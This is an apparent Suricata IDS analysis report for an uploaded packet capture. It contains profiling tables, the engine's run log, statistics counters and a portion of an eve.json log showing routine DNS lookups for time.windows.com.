Filename: merged.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: test-test
Runtime: 3.30460095406 seconds
Hash: 1c95dcebfd89d44f61031e49a8818557
Uploaded: 1530803406

Logfiles


packet_stats.log (7585 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6           501            97340       75304017      25596348         12.8b   92.59
 IPv4      17            28          2774184       76271679      36648138          1.0b    7.41
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6           501            39532       12303525        151053         75.7m   66.93
TMM_FLOWWORKER              IPv4      17            28            35808        9788784        527322         14.8m   13.06
TMM_RECEIVEPCAPFILE         IPv4       6           495             2652           5508          3221          1.6m    1.41
TMM_RECEIVEPCAPFILE         IPv4      17            28             2910          13113          3466         97.1k    0.09
TMM_DECODEPCAPFILE          IPv4       6           495             2760       19296957         42060         20.8m   18.41
TMM_DECODEPCAPFILE          IPv4      17            28             2877          36333          4329        121.2k    0.11

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6           495             2946          26706          3613          1.8m  3.70  
flow                    IPv4      17            28             3096          16992          5024        140.7k  0.29  
stream                  IPv4       6           501             3069         589383         18083          9.1m  18.76 
app-layer               IPv4      17            28             2607          36678         13586        380.4k  0.79  
detect                  IPv4       6           501            19029       12258870         68535         34.3m  71.08 
detect                  IPv4      17            28            18864          69603         36237          1.0m  2.10  
tcp-prune               IPv4       6           501             2622          17292          3162          1.6m  3.28  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             1           128148         128148        128148        128.1k  46.24 
tls                     IPv4       6             2             3200           6700          4950          9.9k  3.57  
dns                     IPv4      17            14             4551          16119          9935        139.1k  50.19 
Proto detect            IPv4      17            20             2946          12585          6740        134.8k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            14            21291         513687        186164          2.6m  10.49 
LOGGER_UNIFIED2             IPv4       6            14            23040         871974         93397          1.3m  5.26  
LOGGER_JSON_ALERT           IPv4       6            14            56790         484365        215999          3.0m  12.17 
LOGGER_JSON_DNS             IPv4      17            12            38979        9644211       1063604         12.8m  51.35 
LOGGER_JSON_HTTP            IPv4       6            14            38256         530952        116771          1.6m  6.58  
LOGGER_JSON_TLS             IPv4       6             1            65655          65655         65655         65.7k  0.26  
LOGGER_JSON_FILE            IPv4       6            27            53274         500013        127837          3.5m  13.89 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
http_client_body                  IPv4       6            27             2937          23884          5885       158.9k  100.00
Total                             IPv4                    27                                          5885       158.9k

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6             6             2886           3915          3229         19.4k  0.14  
PROF_DETECT_IPONLY          IPv4      17            20             2847           6615          3941         78.8k  0.58  
PROF_DETECT_RULES           IPv4       6            44             2727         163368         27037          1.2m  8.80  
PROF_DETECT_STATEFUL_START    IPv4       6            14            41934         123804         55340        774.8k  5.73  
PROF_DETECT_STATEFUL_CONT    IPv4       6            44             2814           6066          3546        156.0k  1.15  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           476             2628           8799          3001          1.4m  10.57 
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            12             2814          19593          4588         55.1k  0.41  
PROF_DETECT_PREFILTER       IPv4       6            44             8127         430383         30765          1.4m  10.02 
PROF_DETECT_PF_TX           IPv4       6            41             2778         415977         19719        808.5k  5.98  
PROF_DETECT_PF_SORT1        IPv4       6             1             2949           2949          2949          2.9k  0.02  
PROF_DETECT_PF_SORT2        IPv4       6            44             2598          11320          3113        137.0k  1.01  
PROF_DETECT_NONMPMLIST      IPv4       6            44             2811         405945         12350        543.4k  4.02  
PROF_DETECT_ALERT           IPv4       6           501             2607          11931          2988          1.5m  11.08 
PROF_DETECT_ALERT           IPv4      17            28             2820           5529          3295         92.3k  0.68  
PROF_DETECT_CLEANUP         IPv4       6           501             2637         409314          4586          2.3m  17.00 
PROF_DETECT_CLEANUP         IPv4      17            28             2613           6441          3848        107.8k  0.80  
PROF_DETECT_GETSGH          IPv4       6           501             2598        1294437          5626          2.8m  20.86 
PROF_DETECT_GETSGH          IPv4      17            28             2829           9048          5455        152.8k  1.13  


suricata-report-2018-07-05-T-15-10-10-07052018.1510-merged.pcap.txt (10765 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /tmp/IXUyPT -l /var/www/html/1c95dcebfd89d44f61031e49a8818557140b85e9e9124dd03a3071940a2c06d1 -r /var/pcap/07052018.1510-merged.pcap -vvv -k none
elapsedtime:1.722179
stderr:
stdout:
5/7/2018 -- 15:10:08 - <Notice> - This is Suricata version 4.0.0 RELEASE
5/7/2018 -- 15:10:08 - <Info> - CPUs/cores online: 1
5/7/2018 -- 15:10:08 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 34041 and 'request-body-inspect-window' set to 16717 after randomization.
5/7/2018 -- 15:10:08 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33945 and 'response-body-inspect-window' set to 16758 after randomization.
5/7/2018 -- 15:10:08 - <Config> - DNS request flood protection level: 500
5/7/2018 -- 15:10:08 - <Config> - DNS per flow memcap (state-memcap): 524288
5/7/2018 -- 15:10:08 - <Config> - DNS global memcap: 16777216
5/7/2018 -- 15:10:08 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
5/7/2018 -- 15:10:08 - <Config> - preallocated 1000 hosts of size 136
5/7/2018 -- 15:10:08 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
5/7/2018 -- 15:10:08 - <Config> - using magic-file /usr/share/file/magic
5/7/2018 -- 15:10:08 - <Config> - Core dump size is unlimited.
5/7/2018 -- 15:10:08 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
5/7/2018 -- 15:10:08 - <Config> - preallocated 1000 defrag trackers of size 168
5/7/2018 -- 15:10:08 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
5/7/2018 -- 15:10:08 - <Config> - stream "prealloc-sessions": 2048 (per thread)
5/7/2018 -- 15:10:08 - <Config> - stream "memcap": 33554432
5/7/2018 -- 15:10:08 - <Config> - stream "midstream" session pickups: disabled
5/7/2018 -- 15:10:08 - <Config> - stream "async-oneside": disabled
5/7/2018 -- 15:10:08 - <Config> - stream "checksum-validation": disabled
5/7/2018 -- 15:10:08 - <Config> - stream."inline": disabled
5/7/2018 -- 15:10:08 - <Config> - stream "bypass": disabled
5/7/2018 -- 15:10:08 - <Config> - stream "max-synack-queued": 5
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly "memcap": 134217728
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly "depth": 0
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly "toserver-chunk-size": 2573
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly "toclient-chunk-size": 2538
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly.raw: enabled
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly "segment-prealloc": 2048
5/7/2018 -- 15:10:08 - <Config> - Delayed detect disabled
5/7/2018 -- 15:10:08 - <Config> - pattern matchers: MPM: ac, SPM: bm
5/7/2018 -- 15:10:08 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
5/7/2018 -- 15:10:08 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
5/7/2018 -- 15:10:08 - <Config> - prefilter engines: MPM
5/7/2018 -- 15:10:08 - <Config> - IP reputation disabled
5/7/2018 -- 15:10:08 - <Perf> - Registered 148 keyword profiling counters.
5/7/2018 -- 15:10:08 - <Config> - Loading rule file: /tmp/tmpnRSXzF
5/7/2018 -- 15:10:08 - <Info> - 1 rule files processed. 2 rules successfully loaded, 0 rules failed
5/7/2018 -- 15:10:08 - <Info> - Threshold config parsed: 0 rule(s) found
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tcp-packet
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tcp-stream
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for udp-packet
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for other-ip
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_uri
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_request_line
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_client_body
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_response_line
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_header
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_header
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_header_names
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_header_names
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_accept
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_accept_enc
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_accept_lang
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_referer
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_connection
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_content_len
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_content_len
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_content_type
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_content_type
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_protocol
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_protocol
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_start
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_start
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_raw_header
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_raw_header
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_method
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_cookie
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_cookie
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_raw_uri
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_user_agent
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_host
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_raw_host
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_stat_msg
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_stat_code
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for dns_query
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tls_sni
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tls_cert_issuer
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tls_cert_subject
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tls_cert_serial
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for dce_stub_data
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for dce_stub_data
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for ssh_protocol
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for ssh_protocol
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for ssh_software
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for ssh_software
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for file_data
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for file_data
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_request_line
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_response_line
5/7/2018 -- 15:10:08 - <Info> - 2 signatures processed. 0 are IP-only rules, 0 are inspecting packet payload, 2 inspect application layer, 0 are decoder event only
5/7/2018 -- 15:10:08 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
5/7/2018 -- 15:10:08 - <Perf> - TCP toserver: 1 port groups, 1 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - TCP toclient: 0 port groups, 0 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - UDP toserver: 0 port groups, 0 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - UDP toclient: 0 port groups, 0 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - OTHER toserver: 0 proto groups, 0 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - OTHER toclient: 0 proto groups, 0 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - Unique rule groups: 1
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toserver TCP packet": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toclient TCP packet": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toserver TCP stream": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toclient TCP stream": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toserver UDP packet": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toclient UDP packet": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "other IP packet": 0
5/7/2018 -- 15:10:08 - <Perf> - AppLayer MPM "toserver http_client_body": 1
5/7/2018 -- 15:10:08 - <Perf> - Registered 2 rule profiling counters.
5/7/2018 -- 15:10:08 - <Info> - fast output device (regular) initialized: alert
5/7/2018 -- 15:10:08 - <Info> - eve-log output device (regular) initialized: eve.json
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'alert'
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'http'
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'dns'
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'tls'
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'files'
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'ssh'
5/7/2018 -- 15:10:08 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
5/7/2018 -- 15:10:08 - <Info> - stats output device (regular) initialized: stats.log
5/7/2018 -- 15:10:08 - <Config> - AutoFP mode using "Hash" flow load balancer
5/7/2018 -- 15:10:08 - <Info> - reading pcap file /var/pcap/07052018.1510-merged.pcap
5/7/2018 -- 15:10:08 - <Config> - using 1 flow manager threads
5/7/2018 -- 15:10:08 - <Config> - using 1 flow recycler threads
5/7/2018 -- 15:10:08 - <Notice> - all 2 packet processing threads, 4 management threads initialized, engine started.
5/7/2018 -- 15:10:08 - <Info> - pcap file end of file reached (pcap err code 0)
5/7/2018 -- 15:10:08 - <Notice> - Signal Received.  Stopping engine.
5/7/2018 -- 15:10:09 - <Perf> - 0 new flows, 0 established flows were timed out, 0 flows in closed state
5/7/2018 -- 15:10:09 - <Info> - time elapsed 0.642s
5/7/2018 -- 15:10:10 - <Perf> - 17 flows processed
5/7/2018 -- 15:10:10 - <Notice> - Pcap-file module read 523 packets, 472105 bytes
5/7/2018 -- 15:10:10 - <Perf> - AutoFP - Total flow handler queues - 1
5/7/2018 -- 15:10:10 - <Info> - Alerts: 14
5/7/2018 -- 15:10:10 - <Perf> - ippair memory usage: 398144 bytes, maximum: 16777216
5/7/2018 -- 15:10:10 - <Perf> - Done dumping profiling data.
5/7/2018 -- 15:10:10 - <Perf> - host memory usage: 398144 bytes, maximum: 16777216
5/7/2018 -- 15:10:10 - <Perf> - Dumping profiling data for 2 rules.
5/7/2018 -- 15:10:10 - <Perf> - Done dumping profiling data.
5/7/2018 -- 15:10:10 - <Perf> - Done dumping keyword profiling data.
5/7/2018 -- 15:10:10 - <Info> - cleaning up signature grouping structure... complete
returncode: 0
errors:
warnings:


stats.log (3137 bytes)
------------------------------------------------------------------------------------
Date: 7/5/2018 -- 15:10:10 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 523
decoder.bytes                              | Total                     | 472105
decoder.ipv4                               | Total                     | 523
decoder.ethernet                           | Total                     | 523
decoder.tcp                                | Total                     | 495
decoder.udp                                | Total                     | 28
decoder.avg_pkt_size                       | Total                     | 902
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 3
flow.udp                                   | Total                     | 14
tcp.sessions                               | Total                     | 3
tcp.syn                                    | Total                     | 3
tcp.synack                                 | Total                     | 3
tcp.overlap                                | Total                     | 2
detect.alert                               | Total                     | 14
app_layer.flow.http                        | Total                     | 1
app_layer.tx.http                          | Total                     | 14
app_layer.flow.tls                         | Total                     | 1
app_layer.flow.failed_tcp                  | Total                     | 1
app_layer.flow.dns_udp                     | Total                     | 6
app_layer.tx.dns_udp                       | Total                     | 6
app_layer.flow.failed_udp                  | Total                     | 8
flow_mgr.new_pruned                        | Total                     | 4
flow_mgr.est_pruned                        | Total                     | 5
flow.spare                                 | Total                     | 10005
flow_mgr.flows_checked                     | Total                     | 10
flow_mgr.flows_notimeout                   | Total                     | 5
flow_mgr.flows_timeout                     | Total                     | 5
flow_mgr.flows_removed                     | Total                     | 5
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65523
flow_mgr.rows_empty                        | Total                     | 3
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7078048


eve.json (52961 bytes)
{"timestamp":"2018-07-02T11:49:28.675362+0000","flow_id":6109880929826,"pcap_cnt":7,"event_type":"dns","src_ip":"192.168.95.10","src_port":62635,"dest_ip":"10.55.99.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57387,"rrname":"time.windows.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"time.windows.com","rrtype":"CNAME","ttl":2087,"rdata":"time.microsoft.akadns.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"time.microsoft.akadns.net","rrtype":"A","ttl":153,"rdata":"52.168.138.145"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"b.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"j.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"h.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"d.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"f.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"m.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"i.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"e.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"g.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"l.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"c.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"k.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"a.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.184312+0000","flow_id":345723682607096,"pcap_cnt":9,"event_type":"dns","src_ip":"192.168.95.10","src_port":53459,"dest_ip":"10.55.99.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6249,"rrname":"time.windows.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"time.windows.com","rrtype":"CNAME","ttl":2085,"rdata":"time.microsoft.akadns.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"time.microsoft.akadns.net","rrtype":"A","ttl":151,"rdata":"52.168.138.145"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"i.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"k.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"b.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"c.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"a.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"h.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"f.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"j.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"g.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"l.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"d.gtld-servers.net"}}
